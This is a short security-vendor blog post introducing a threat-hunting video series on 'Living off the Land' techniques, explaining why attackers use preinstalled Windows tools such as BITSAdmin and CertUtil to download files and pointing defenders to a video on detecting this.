Living off the Land (LotL) - Downloading Files on Microsoft Windows

Cyborg Security is starting an exciting new series of threat hunting videos dedicated to the practice of Living off the Land (LotL)!

[Image: Living off the land meme]

Living off the Land (LotL) refers to threat actor behavior in which the attacker will use tools and resources that are readily available in the compromised environment. Threat actors, by using this methodology, can see tremendous gains. First, by utilizing pre-installed tools, threat actors will decrease their likelihood for detection. Second, they will minimize their operational need to bring additional tools onto a target system. Lastly, by using those toolsets, the actors can help confound attribution efforts.

These videos will focus on the common tactics, techniques, and procedures (TTPs) threat actors use to remain undetected in an environment. The video series will introduce the TTPs, explore how actors use them, and what organizations can do to detect this activity in their environment.

In the first part of this new series we are taking a look at living off the land techniques for downloading remote files on Microsoft Windows. There are a plethora of different tools and binaries to accomplish downloading remote files on Microsoft Windows. BITSAdmin and CertUtil come pre-installed on all Microsoft Windows systems and are some of the most commonly used tools by threat actors to accomplish downloading remote files. Check out the video below to learn more about these tools and how to hunt for them!